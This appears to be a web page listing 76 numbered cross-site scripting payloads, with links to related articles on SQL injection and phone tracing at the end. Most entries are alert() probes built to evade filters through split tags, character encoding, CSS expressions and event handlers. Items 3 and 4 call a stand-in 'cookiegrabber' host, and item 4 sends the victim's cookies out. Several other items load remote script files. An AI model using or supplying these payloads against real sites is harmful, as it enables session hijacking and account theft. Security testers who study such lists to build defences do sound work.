1. <script>alert(1);</script>
    2. 
	
  2. <script>alert('XSS');</script>
    3. 
	
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    4. 
	
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    5. 
	
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
    6. 
	
  6. <script>alert(String.fromCharCode(88,83,83))</script>
    7. 
	
  7. <img src=foo.png onerror=alert(/xssed/) />
    8. 
	
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    9. 
	
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    10. 
	
  10. <marquee><script>alert('XSS')</script></marquee>
    11. 
	
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
    12. 
	
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
    13. 
	
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
    14. 
	
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    15. 
	
  15. "><script>alert(0)</script>
    16. 
	
  16. <script src=http://yoursite.com/your_files.js></script>
    17. 
	
  17. </title><script>alert(/xss/)</script>
    18. 
	
  18. </textarea><script>alert(/xss/)</script>
    19. 
	
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
    20. 
	
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
    21. 
	
  21. <font style='color:expression(alert(document.cookie))'>
    22. 
	
  22. '); alert('XSS
    23. 
	
  23. <img src="javascript:alert('XSS')">
    24. 
	
  24. <script language="JavaScript">alert('XSS')</script>
    25. 
	
  25. [url=javascript:alert('XSS');]click me[/url]
    26. 
	
  26. <body onunload="javascript:alert('XSS');">
    27. 
	
  27. <body onLoad="alert('XSS');"
    28. 
	
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
    29. 
	
  29. "/></a></><img src=1.gif onerror=alert(1)>
    30. 
	
  30. window.alert("Bonjour !");
    31. 
	
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
    32. 
	
  32. alert(String.fromCharCode(88,83,83));'))">
    33. 
	
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    34. 
	
  34. "><script alert(String.fromCharCode(88,83,83))</script>
    35. 
	
  35. '>><marquee><h1>XSS</h1></marquee>
    36. 
	
  36. '">><script>alert('XSS')</script>
    37. 
	
  37. '">><marquee><h1>XSS</h1></marquee>
    38. 
	
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    39. 
	
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    40. 
	
  40. <script>var var = 1; alert(var)</script>
    41. 
	
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    42. 
	
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    43. 
	
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
    44. 
	
  44. " onfocus=alert(document.domain) "> <"
    45. 
	
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    46. 
	
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    47. 
	
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
    48. 
	
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
    49. 
	
  49. <br size=\"&{alert('XSS')}\">
    50. 
	
  50. <scrscriptipt>alert(1)</scrscriptipt>
    51. 
	
  51. </br style=a:expression(alert())>
    52. 
	
  52. </script><script>alert(1)</script>
    53. 
	
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    54. 
	
  54. [color=red width=expression(alert(123))][color]
    55. 
	
  55. <BASE HREF="javascript:alert('XSS');//">
    56. 
	
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    57. 
	
  57. "></iframe><script>alert(123)</script>
    58. 
	
  58. <body onLoad="while(true) alert('XSS');">
    59. 
	
  59. '"></title><script>alert(1111)</script>
    60. 
	
  60. </textarea>'"><script>alert(document.cookie)</script>
    61. 
	
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
    62. 
	
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
    63. 
	
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
    64. 
	
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    65. 
	
  65. '></select><script>alert(123)</script>
    66. 
	
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
    67. 
	
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
    68. 
	
  68. <SCRIPT>document.write("XSS");</SCRIPT>
    69. 
	
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
    70. 
	
  70. ='><script>alert("xss")</script>
    71. 
	
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
    72. 
	
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
    73. 
	
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
    74. 
	
  74.  ">/PlanetCreator/><script>alert(document.cookie)</script>
    75. 
	
  75. src="http://www.site.com/XSS.js">
    76. 
	
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
    77.

Explore More

Mobile trace – How cell phone tracing works? Technology, and software’s

Is it possible to track a GSM/ CDMA cellular phone? Is there a software in market which tracking the location of the phone? Is it possible to track lost mobile?

Read More

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.this tutorial is not going to go into detail on why these

Read More

Misconfigured security features or Incorrect use of security

Session cookie is not randomized enoughNumerous applications use a session cookie to maintain the state of a logged in user. The use of authentication to validate the user that has

Read More